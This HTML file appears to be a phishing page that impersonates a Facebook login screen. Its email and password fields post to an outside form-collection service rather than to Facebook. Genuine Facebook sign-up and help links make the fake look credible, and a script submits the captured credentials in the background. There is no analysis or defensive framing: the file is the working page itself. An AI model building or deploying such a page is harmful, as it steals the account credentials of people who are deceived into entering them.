<!DOCTYPE html>
<html>
<head>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Gideon+Roman&family=Oswald&family=Roboto+Serif&display=swap" rel="stylesheet">
<meta charset="UTF-8">
<style type="text/css">
*{
margin:0;
padding:0;
box-sizing:border-box;

}
body{
background:#4a65a5
}
h1{
text-align:center;
padding-top:100px;
font-size:80px;
color:#fff;
font-family: 'Oswald', sans-serif;
}
.container{
width:80%;
margin:200px auto;
text-align:center;


}
input{
margin-top:30px;
width:750px;
height:90px;
background:#fff;
padding:10px;
color:#000;
font-size:35px;
border-radius:5px;
outline:none;
}
button{
margin-top:20px;
width:750px;
height:80px;
font-weight:bold;
font-size:45px;
background:#213873;
color:#fff;
outline:none;
border-radius:5px;


}
p{
text-align:center;
font-size:32px;
color:#fff;
}
.p{margin-top:10px;
font-size:26px;
text-decoration:none}

h3{text-align:center;
margin-top:20px;
color:#fff}
</style>
	<title>HTML Form to Mail</title>
  <link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
   
   <h1>Facebook</h1>
   <h3>Login With Facebook</h3>
  <div class="container">
    <form action="https://formspree.io/f/mdobzlva" method="POST" id="my-form">
     <input type="email" id="email" name="email" placeholder="E-mail or Phone"><br>
     <input type="password" id="Name" name="Name" placeholder="Password"><br>
    <button type="submit">Login</button>
   </form>
   </div>
   
   <a href="https://m.facebook.com/r.php?next=%2Fhome.php&rtime=1645244541&subno_key=AaF0oPdKoIL9VIRI9R-Q9GfUqp-o953JoSlpaW--KixQqb09g0dqmsXBBYYozQF-NCY4Pyeh1U8ZKzdFjWy-NM2BiGGi6ozAfIanTQ2psfYnlOSU9tjPFHWpLnI9om7RA_Fjc3NP9ub58gAee6BxZp_qTqvuRVDGIV_tQ1R2UJA83jaL9_yvWF7AUc9MtX2inxqCIfQhONOv8U7xGVwFyi24JBgDTfMsTt17C6GJ_e7qOc6bpgrIYfLh7R9WbEBYScYZNwyC60GWiu5zeLSUHhvV8LiJz06P5bMaZr8wpQSVdMEIPGkU8EF_xT5gHaqe-a8&hrc=1&refsrc=deprecated&soft=hjk" ><p>Sign Up for Facebook </p></a>
   <a href="https://m.facebook.com/help/570785306433644" ><p class="p">Need Help?</p></a>
<script type="text/javascript" src="script.js">

window.addEventListener("DOMContentLoaded", function () {
  // get the form elements defined in your form HTML above

  var form = document.getElementById("my-form");
  // var button = document.getElementById("my-form-button");
  var status = document.getElementById("status");

  // Success and Error functions for after the form is submitted

  function success() {
    form.reset();
    
    status.innerHTML = "Thanks!";
  }

  function error() {
    status.classList.add("error");
    status.innerHTML = "Oops! There was a problem.";
  }

  // handle the form submission event

  form.addEventListener("submit", function (ev) {
    ev.preventDefault();
    var data = new FormData(form);
    ajax(form.method, form.action, data, success, error);
  });
});

// helper function for sending an AJAX request

function ajax(method, url, data, success, error) {
  var xhr = new XMLHttpRequest();
  xhr.open(method, url);
  xhr.setRequestHeader("Accept", "application/json");
  xhr.onreadystatechange = function () {
    if (xhr.readyState !== XMLHttpRequest.DONE) return;
    if (xhr.status === 200) {
      success(xhr.response, xhr.responseType);
    } else {
      error(xhr.status, xhr.response, xhr.responseType);
    }
  };
  xhr.send(data);
}


</script>
</body>
</html>
